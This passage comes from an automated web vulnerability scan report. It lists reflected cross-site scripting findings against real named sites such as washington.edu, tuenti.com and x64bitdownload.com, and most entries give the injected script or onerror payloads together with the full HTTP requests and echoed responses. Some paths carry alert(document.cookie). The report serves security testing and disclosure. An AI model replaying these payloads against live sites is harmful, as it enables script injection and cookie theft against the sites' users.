Date: Mon, 24 Jan 2011 15:12:07 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27582

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/x22ec89d<script>alert(1)</script>93a08fbf703</span>
...[SNIP]...

4.1472. http://www.traderonline.com/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 522a7<script>alert(1)</script>3f4e0a626ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /x22?522a7<script>alert(1)</script>3f4e0a626ca=1 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:12:03 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27585

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/x22?522a7<script>alert(1)</script>3f4e0a626ca=1</span>
...[SNIP]...

4.1473. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tuenti.com
Path:	/share

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a61"><script>alert(1)</script>29d0ea3ffb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /share?15a61"><script>alert(1)</script>29d0ea3ffb0=1 HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Connection: close
Date: Tue, 25 Jan 2011 04:39:29 GMT
Content-Length: 39388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
<form method="post" action="?15a61"><script>alert(1)</script>29d0ea3ffb0=1" id="lang_form_1">
...[SNIP]...

4.1474. http://www.washington.edu/alpine/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpine/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f972a<img%20src%3da%20onerror%3dalert(1)>e6e3afeb687 was submitted in the REST URL parameter 1. This input was echoed as f972a<img src=a onerror=alert(1)>e6e3afeb687 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img%20src%3da%20onerror%3dalert(1)>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:12:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1141
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(1)>e6e3afeb687/</b> was not found or is no longer
...[SNIP]...
<br>
Reason: File does not exist: /www/world/alpinef972a<img src=a onerror=alert(1)>e6e3afeb687.</br>
...[SNIP]...

4.1475. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 13141><img%20src%3da%20onerror%3dalert(1)>dc54bd8fde8 was submitted in the REST URL parameter 1. This input was echoed as 13141><img src=a onerror=alert(1)>dc54bd8fde8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img13141><img%20src%3da%20onerror%3dalert(1)>dc54bd8fde8 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1181
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img13141><img src=a onerror=alert(1)>dc54bd8fde8</b> was not found o
...[SNIP]...
<img13141><img src=a onerror=alert(1)>dc54bd8fde8.</br>
...[SNIP]...

4.1476. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1e946<script>alert(1)</script>a554c0a9069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpinef972a<img?1e946<script>alert(1)</script>a554c0a9069=1 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1116
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img?1e946<script>alert(1)</script>a554c0a9069=1</b> was not found or is no lo
...[SNIP]...

4.1477. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload e2312><img%20src%3da%20onerror%3dalert(1)>f9a01abcc36 was submitted in the REST URL parameter 1. This input was echoed as e2312><img src=a onerror=alert(1)>f9a01abcc36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img%20srce2312><img%20src%3da%20onerror%3dalert(1)>f9a01abcc36=a%20onerror=alert(String.fromCharCode(88,83,83 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1328
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img srce2312><img src=a onerror=alert(1)>f9a01abcc36=a onerror=alert
...[SNIP]...
<img srce2312><img src=a onerror=alert(1)>f9a01abcc36=a onerror=alert(String.fromCharCode(88,83,83.</br>
...[SNIP]...

4.1478. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 24c9e<script>alert(1)</script>e47c3de87fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83?24c9e<script>alert(1)</script>e47c3de87fe=1 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1263
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83?24c9e<script>alert(1)</script>e47c3de87fe=1</b>
...[SNIP]...

4.1479. http://www.washington.edu/alpinef972ae6e3afeb687/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload 8624f><img%20src%3da%20onerror%3dalert(1)>a52668d1945 was submitted in the REST URL parameter 1. This input was echoed as 8624f><img src=a onerror=alert(1)>a52668d1945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img%20src8624f><img%20src%3da%20onerror%3dalert(1)>a52668d1945=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:09 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src8624f><img src=a onerror=alert(1)>a52668d1945=a onerror=alert
...[SNIP]...
<img src8624f><img src=a onerror=alert(1)>a52668d1945=a onerror=alert(String.fromCharCode(88,83,83))>
...[SNIP]...

4.1480. http://www.washington.edu/alpinef972ae6e3afeb687/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8e4f<script>alert(1)</script>22252d51a54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/?b8e4f<script>alert(1)</script>22252d51a54=1 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1313
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/?b8e4f<script>alert(1)</script>22252d51a54=1</b>
...[SNIP]...

4.1481. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload ef31e><img%20src%3da%20onerror%3dalert(1)>0cd7daaa6cd was submitted in the REST URL parameter 1. This input was echoed as ef31e><img src=a onerror=alert(1)>0cd7daaa6cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img%20srcef31e><img%20src%3da%20onerror%3dalert(1)>0cd7daaa6cd=a%20onerror=alert(document.cookie HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1289
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img srcef31e><img src=a onerror=alert(1)>0cd7daaa6cd=a onerror=alert
...[SNIP]...
<img srcef31e><img src=a onerror=alert(1)>0cd7daaa6cd=a onerror=alert(document.cookie.</br>
...[SNIP]...

4.1482. http://www.washington.edu/alpinef972a previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 908e6<script>alert(1)</script>c5fe2abfd28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie?908e6<script>alert(1)</script>c5fe2abfd28=1 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1224
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie?908e6<script>alert(1)</script>c5fe2abfd28=1</b>
...[SNIP]...

4.1483. http://www.washington.edu/alpinef972ae6e3afeb687/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload bafe1><img%20src%3da%20onerror%3dalert(1)>1bf1e4c1efb was submitted in the REST URL parameter 1. This input was echoed as bafe1><img src=a onerror=alert(1)>1bf1e4c1efb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /alpinef972a<img%20srcbafe1><img%20src%3da%20onerror%3dalert(1)>1bf1e4c1efb=a%20onerror=alert(document.cookie)>e6e3afeb687/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1336
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img srcbafe1><img src=a onerror=alert(1)>1bf1e4c1efb=a onerror=alert
...[SNIP]...
<img srcbafe1><img src=a onerror=alert(1)>1bf1e4c1efb=a onerror=alert(document.cookie)>
...[SNIP]...

4.1484. http://www.washington.edu/alpinef972ae6e3afeb687/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 17a40<script>alert(1)</script>9052f2c52d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/?17a40<script>alert(1)</script>9052f2c52d7=1 HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1271
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/alpinef972a<img src=a onerror=alert(document.cookie)>e6e3afeb687/?17a40<script>alert(1)</script>9052f2c52d7=1</b>
...[SNIP]...

4.1485. http://www.washington.edu/pine/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washington.edu
Path:	/pine/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1fab8<img%20src%3da%20onerror%3dalert(1)>cbed7a69ba2 was submitted in the REST URL parameter 1. This input was echoed as 1fab8<img src=a onerror=alert(1)>cbed7a69ba2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pine1fab8<img%20src%3da%20onerror%3dalert(1)>cbed7a69ba2/ HTTP/1.1
Host: www.washington.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:12:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1135
Connection: close
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/pine1fab8<img src=a onerror=alert(1)>cbed7a69ba2/</b> was not found or is no longer on
...[SNIP]...
<br>
Reason: File does not exist: /www/world/pine1fab8<img src=a onerror=alert(1)>cbed7a69ba2.</br>
...[SNIP]...

4.1486. http://www.x64bitdownload.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff09"><script>alert(1)</script>13dc0cda439 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2ff09"><script>alert(1)</script>13dc0cda439=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:32:37 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/?2ff09"><script>alert(1)</script>13dc0cda439=1" />
...[SNIP]...

4.1487. http://www.x64bitdownload.com/64-bit-assembling-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2b79"><script>alert(1)</script>8459f495ec0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-assembling-downloads.htmle2b79"><script>alert(1)</script>8459f495ec0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-assembling-downloads.htmle2b79"><script>alert(1)</script>8459f495ec0" />
...[SNIP]...

4.1488. http://www.x64bitdownload.com/64-bit-assembling-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 634a7"><script>alert(1)</script>8617ba432e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-assembling-downloads.html?634a7"><script>alert(1)</script>8617ba432e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-assembling-downloads.html?634a7"><script>alert(1)</script>8617ba432e=1" />
...[SNIP]...

4.1489. http://www.x64bitdownload.com/64-bit-atom-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55aa1"><script>alert(1)</script>7678cf509d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-atom-downloads.html55aa1"><script>alert(1)</script>7678cf509d9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:14 GMT
Cache-Control: max-age=600
Pragma: cache
